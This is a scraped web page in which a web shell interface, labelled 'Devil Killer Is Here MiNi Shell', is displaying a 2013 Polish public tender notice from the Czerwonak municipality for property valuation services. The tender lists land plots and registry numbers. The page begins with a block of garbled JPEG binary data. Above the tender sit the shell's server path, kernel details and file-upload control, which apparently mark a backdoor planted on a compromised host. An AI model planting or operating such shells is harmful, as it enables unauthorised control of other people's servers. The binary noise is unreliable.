JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130125/13895-N-2013.html

<p class="kh_header"><b>Czerwonak: Szacowanie nieruchomości dla potrzeb gospodarki nieruchomościami oraz planowania i zagospodarowania przestrzennego</b><br>
<b>Numer ogłoszenia: 13895 - 2013; data zamieszczenia: 25.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czerwonak , ul. Źródlana 39, 62-004 Czerwonak, woj. wielkopolskie, tel. 61 6544204, faks 61 8120270.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czerwonak.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szacowanie nieruchomości dla potrzeb gospodarki nieruchomościami oraz planowania i zagospodarowania przestrzennego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje wykonywanie usług w zakresie wycen nieruchomości dla potrzeb gospodarki nieruchomościami oraz planowania i zagospodarowania przestrzennego w celu:
1)	określenia wartości rynkowych nieruchomości dla ustalenia opłat adiacenckich z tytułu podziału nieruchomości, 
2)	określenia wartości rynkowych nieruchomości dla ustalenia opłat adiacenkich z tytułu budowy urządzeń infrastruktury technicznej,
3)	określenia wartości rynkowych nieruchomości gruntowych niezabudowanych i zabudowanych przeznaczonych do nabycia, zamiany, zbycia lub oddania użytkowania wieczyste,
4)	określenia wartości rynkowej prawa własności oraz prawa użytkowania wieczystego gruntu dla potrzeb ustalenia opłaty, w trybie przepisów ustawy z 29 lipca 2005 roku o przekształceniu prawa użytkowania wieczystego w prawo własności,
5)	określenia wartości rynkowych nieruchomości lokalowych (mieszkalnych, użytkowych) przeznaczonych do sprzedaży,
6)	określenia wartości rynkowej spółdzielczych własnościowych praw do lokali,
7)	określenia wartości ograniczonych praw rzeczowych (służebność, użytkowanie, służebność przesyłu),
8)	określenia wartości nasadzeń i nakładów budowlanych w celu ustalenia odszkodowania,
9)	określenia odszkodowania za bezumowne użytkowanie nieruchomości,
10)	określenie wartości nieruchomości gruntowych zajętych lub nabywanych pod drogi publiczne oraz dla ustalenia odszkodowania za drogi publiczne (przejmowane w trybie art. 98 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (tj. Dz.U. z 2010r. Nr 102 poz. 651 ze zm.), zgodnie z § 36 Rozporządzenia Rady Ministrów z dnia 21 września 2004r. w sprawie wyceny nieruchomości i sporządzenia operatu szacunkowego (Dz.U. z 2004r. Nr 207 poz. 651ze zm.),
11)	 określenia wartości nieruchomości niezabudowanych i zabudowanych placami zabaw w celu oddania w trwały zarząd,
12)	określenia wartości stawki czynszu dzierżawnego w celu oddania nieruchomości w dzierżawę,
13)	określenia wartości nieruchomości zgodnie z art. 36 ustawy o planowaniu i zagospodarowaniu przestrzennym.

2.	Zakres przedmiotu zamówienia:
1)	dla nieruchomości zdefiniowanych - określenie wartości rynkowych nieruchomości dla potrzeb naliczenia opłaty adiacenckiej podziałowej (łącznie 20 operatów): 

a)	dla nieruchomości dzielonej stanowiącej działkę nr 10, o pow. 0,4700 ha, obręb Kicin,  zapisanej w KW PO1P/00031167/8 (w wyniku podziału powstały 4 działki) - 1 operat,
b)	dla nieruchomości dzielonych stanowiących działki  nr 277/3 o pow. 0,2341 ha i  nr 277/6, o pow. 0,1954 ha, obręb Miękowo, zapisanych w KW PO1P/00075666/6 (w wyniku podziału powstały 4 działki) - 1 operat,
c)	dla nieruchomości dzielonej stanowiącej działkę nr 511/27 o pow. 4,0215 ha, obręb Owińska,  zapisanej w KW PO1P/00012387/7 (w wyniku podziału powstały 2 działki) - 1 operat,
d)	dla nieruchomości dzielonej stanowiącej działkę nr 326/11 o pow. 2,7066 ha, obręb Kicin zapisanej 
w KW PO1P/00008342/9 (w wyniku podziału powstały 2 działki) - 1 operat,
e)	dla nieruchomości dzielonej stanowiącej działkę nr 7/19 o pow. 32,3593 ha, obręb Annowo, zapisanej w KW PO1P/00150750/2 (w wyniku podziału powstało 10 działek) - 1 operat,
f)	dla nieruchomości dzielonych stanowiących działki nr 91/1, o pow. 1,2480 ha, obręb Kicin, zapisanej w KW PO1P/ 00008646/0 (w wyniku podziału powstały 2 działki) i działki nr 454, o pow. 1,3100 ha, obręb Kicin, zapisanej w KW PO1P/00054559/0 (w wyniku podziału powstały 2 działki) - 1 operat,
g)	dla nieruchomości dzielonej stanowiącej działkę nr 344/1 o pow.0,3800 ha, obręb Owińska (obecnie obręb Bolechówko) zapisanej w KW PO1P/00051747/4 (w wyniku podziału powstały 2 działki) - 1 operat,
h)	dla nieruchomości dzielonej stanowiącej działkę nr 17/3 o pow. 0,4216 ha, obręb Mielno, zapisanej w KW PO1P/ 00098343/3 (w wyniku podziału powstały 2 działki) - 1 operat,
i)	dla nieruchomości dzielonej stanowiącej działkę nr 392/23, o pow. 0,2761 ha, obręb Owińska (obecnie obręb Potasze) zapisanej w KW PO1P/00065633/3(w wyniku podziału powstały 2 działki) - 1 operat,
j)	dla nieruchomości dzielonej stanowiącej działkę nr 166/6, o pow. 0,9396 ha, obręb Kicin, zapisanej w KW PO1P/00085297/1 (w wyniku podziału powstały 2 działki) - 1 operat,
k)	dla nieruchomości dzielonej stanowiącej działkę nr 46/90, pow. 1,1943 ha, obręb Miękowo, zapisanej  w KW PO1P/00273076/1 (w wyniku podziału powstało 13 działek) - 1 operat,
l)	dla nieruchomości dzielonej stanowiącej działkę nr 46/86, o pow. 1,0922 ha, obręb Miękowo, zapisanej w KW PO1P/00273073/0 (w wyniku podziału powstało 11 działek) - 1 operat,
m)	dla nieruchomości dzielonych stanowiących działki nr 259/16, o pow. 0,0600 ha i nr 259/17, o pow. 0,0600 ha; obręb Owińska, zapisanych w KW PO1P/00042100/1 (w wyniku podziału powstały 4 działki) -  1 operat,
n)	dla nieruchomości dzielonej stanowiącej działkę nr 188 o pow. 8,6500 ha, obręb Kicin, zapisanej 
w KW PO1P/ 00022344/7(w wyniku podziału powstały 4 działki) - 1 operat,
o)	dla nieruchomości dzielonej stanowiącej działkę nr 64, o pow. 0,1900 ha, obręb Kicin, zapisanej w KW PO1P/ 00038077/9 (w wyniku podziału powstały 2 działki) - 1 operat,
p)	dla nieruchomości dzielonej stanowiącej działkę nr 286, o pow. 0,2700 ha, obręb Kicin, zapisanej 
w KW PO1P/00057462/4(w wyniku podziału powstały 2 działki) - 1 operat,
q)	dla nieruchomości dzielonej stanowiącej działkę nr 249/8, o pow. 0,9289 ha, obręb Owińska, zapisanej w KW PO1P/00158850/9(w wyniku podziału powstały 2 działki) - 1 operat,
r)	dla nieruchomości dzielonej stanowiących działki nr 106/18 o pow. 1,0450 ha, obręb Koziegłowy, zapisanej w KW PO1P/00233493/8 (w wyniku podziału powstały 4 działki)  i nr 107/66, o pow. 0,0953 ha, obręb Koziegłowy, zapisanej w KW PO1P/ 00232849/2 (w wyniku podziału powstały 4 działki)   - 1 operat,
s)	dla nieruchomości dzielonych stanowiących działkI nr 3/6 o pow. 0,9145 ha, nr 3/7 o pow. 0,8614 ha,  obręb Mielno zapisane w KW PO1P/ 00125228/0; działka nr 3/5, o pow. 1,4812 ha, obręb Mielno zapisana w KW PO1P/00185236/7, działka nr 3/4, o pow. 1,4221 ha, obręb Mielno zapisana w KW PO1P/00185237/4, działka nr 3/2, o pow. 4,6792 ha, obręb Mielno, zapisana w KW PO1P/00127576/8, w wyniku podziału łącznie powstało 13 działek) - 1 operat,
t)	dla nieruchomości dzielonej stanowiącej działkę nr 508/10, o pow. 8,1865 ha, obręb Bolechówko, zapisanej w KW PO1P/00165789/2(w wyniku podziału powstało 9 działek) - 1 operat.

2)	Określenie wartości nieruchomości w celu oddania w trwały zarząd (1 operat):
Dla nieruchomości składającej z działek nr 514/27, nr 514/22, 514/24, arkusz mapy 10, obręb Owińska (lub ich części po podziale) zabudowanej zespołem pawilonów wejściowych do obsługi kąpieliska (dwa budynki) AKWEN TROPICANA .

Dane budynków:
Powierzchnia zabudowy: 91,92 m2 
Powierzchnia użytkowa: 75,75 m2
Kubatura: 323,42 m3
3)	Określenie wartości nieruchomości dla potrzeb aktualizacji opłaty za użytkowanie wieczyste (łącznie 7 operatów):
a)	nieruchomość oznaczona geodezyjnie jako działka nr 8/10, o pow. 0,1318 ha, arkusz mapy 20, obręb Czerwonak, zapisana w KW PO1P/00143507/2 - 1 operat,
b)	nieruchomość oznaczona geodezyjnie jako działka nr 8/12, o pow. 1.8714 ha, arkusz mapy 20, obręb Czerwonak, zapisana w KW PO1P/00143507/2 - 1 operat,
c)	nieruchomość oznaczona geodezyjnie jako działka nr 8/14, o pow. 0.8470 ha, arkusz mapy 20, obręb Czerwonak, zapisana w KW PO1P/00143507/2 - 1 operat,
d)	nieruchomość oznaczona geodezyjnie jako działka nr 94/71, o pow. 0,0758 ha, arkusz mapy 9, obręb Koziegłowy, zapisana w KW PO1P/00229734/9 - 1 operat,
e)	nieruchomość oznaczona geodezyjnie jako działka nr 18/49, o pow. 0.0543 ha, arkusz mapy 21, obręb Czerwonak, zapisana w KW PO1P/00145700/9 - 1 operat,
f)	nieruchomość oznaczona geodezyjnie jako działka nr 18/50, o pow. 0,0229 ha, arkusz mapy 21, obręb Czerwonak, zapisana w KW PO1P/00145700/9 - 1 operat,
g)	nieruchomość oznaczona geodezyjnie jako działka nr 123/1, o pow. 0,0682 ha, arkusz mapy 22, obręb Czerwonak, zapisana w KW PO1P/00145699/8 - 1 operat.
4)	Dla nieruchomości niezdefiniowanych (łącznie 87 operatów):
a)	wykonanie operatów szacunkowych określonych w   pkt. 3.3) i 3.10) - 40 operatów,
b)	wykonanie operatów szacunkowych określonych w   pkt. 3.5) - 3  operaty,
c)	wykonanie operatów szacunkowych określonych w   pkt. 3. 6), 3.7), 3.8) i 3.9) - 15 operatów,
d)	wykonanie operatów szacunkowych określonych w   pkt. 3. 1 - 5 operatów,
e)	wykonanie operatów szacunkowych określonych w   pkt. 3. 4) - 5 operatów,
f)	wykonanie operatów szacunkowych określonych w   pkt. 3.11) - 4 operaty,
g)	wykonanie operatów szacunkowych określonych w   pkt. 3.12) - 2 operaty,
h)	wykonanie operatów szacunkowych określonych w   pkt. 3.2) - 3 operaty,
i)	wykonanie operatów szacunkowych określonych w   pkt. 3.13) - 10 operatów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w przepisie art. 67 ust. 1 pkt 6 Pzp stanowiących nie więcej niż 50% wartości zamówienia podstawowego polegającego na powtórzeniu tego samego rodzaju zamówienia, zgodnego z przedmiotem zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.31.90.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w powyższym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. VII.1.1) SIWZ oraz pktu III.6)1. ogłoszenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje:
a)	co najmniej 5 operatów z zakresu wyceny nieruchomości gruntowych dla celów sprzedaży, wykupu, zamiany,
b)	co najmniej 5 operatów z zakresu wyceny dla potrzeb naliczenia opłaty adiacenckiej z tytułu podziału nieruchomości,
c)	co najmniej 5 operatów z zakresu wyceny w celu nabycia gruntów zajmowanych lub przeznaczonych pod drogi publiczne oraz naliczenia odszkodowania za drogi publiczne,
d)	co najmniej 5 operatów z zakresu wyceny nieruchomości gruntowych zgodnie z art. 36 ustawy o planowaniu i zagospodarowaniu przestrzennym,
e)	co najmniej 5 operatów z zakresu wyceny dla potrzeb naliczenia opłaty adiacenckiej z tytułu budowy urządzeń infrastruktury technicznej;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w powyższym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. VII.1.1) SIWZ oraz pktu III.6)1. ogłoszenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w powyższym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. VII.1.1) SIWZ oraz pktu III.6)1. ogłoszenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w powyższym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. VII.1.1) SIWZ oraz pktu III.6)1. ogłoszenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Prawa zamówień publicznych
2. Ponadto obok dokumentów potwierdzających spełnienie warunków udziału w postępowaniu Wykonawca składa:
1)	ofertę, wg wzoru oferty, stanowiącego część II SIWZ,
2)	dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - 
w przypadku, gdy Wykonawcy składają wspólną ofertę, a podpisywana jest przez pełnomocnika,
3)	stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	przedłużenie terminu wykonania zamówienia dla określonego zlecenia wewnętrznego w sytuacji, w której przy zachowaniu należytej staranności ze strony Wykonawcy, opóźnienie następuje 
z winy osób trzecich, a ich obecność w terenie (lokalu) jest niezbędna dla oddania prawidłowo wykonanego operatu szacunkowego,
2)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, w sytuacji, gdy realizacja umowy przez osobę wskazaną w umowie nie jest możliwa,
3)	zmiana wynagrodzenia, w następstwie zmiany przepisów o podatku od towarów i usług, 
4)	zmiana wynagrodzenia tylko w sytuacji gdy zmiana w zakresie wykonywanych usług powoduje obniżenie wynagrodzenia.
2.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
1)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego),
2)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czerwonak.pl/public/?id=117867<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czerwonak -Biuro Zamówień Publicznych i Pożytku Publicznego ul. Źródlana 39, 62-004 Czerwonak, pok. 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2013 godzina 11:00, miejsce: Urząd Gminy Czerwonak ul. Źródlana 39, 62-004 Czerwonak, pok. 3 (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie realizowane sukcesywnie, zgodnie z zapotrzebowaniem Zamawiającego, w okresie od dnia podpisania umowy do dnia 20 grudnia 2013 r., jednakże nie dłużej niż do wykorzystania maksymalnej wartości nominalnej brutto, 
w tym nieprzekraczalny termin realizacji pojedynczego zlecenia wynosi:
1) 21 dni licząc od dnia otrzymania pisemnego zlecenia - dla nieruchomości niezdefiniowanych określonych  w  pkt.III.4. 4) lit. a), c), e), g), h), i) SIWZ oraz  dla nieruchomości zdefiniowanych określonych pkt.III.4. 3)SIWZ; 
2) 40 dni licząc od dnia otrzymania pisemnego zlecenia - dla nieruchomości zdefiniowanych określonych w pkt. III.4. 1) i 2) SIWZ oraz nieruchomości niezdefiniowanych określonych w pkt.III.4. 4) lit. b), d), f) SIWZ.
2. Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, zgodnie z formułą spełnia - nie spełnia. 3. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia zobowiązani są do ustanowienia Pełnomocnika celem reprezentowania ich w
niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
4. Dokumenty:
1)	należy złożyć w formie oryginału lub kopii poświadczonej ZA ZGODNOŚĆ 
Z ORYGINAŁEM przez Wykonawcę, z wyłączeniem pełnomocnictwa, które należy złożyć w oryginale lub poświadczonej przez notariusza kopii,
2)	zobowiązania podmiotów, o których mowa w pkt VII.4 specyfikacji, należy złożyć w oryginale,
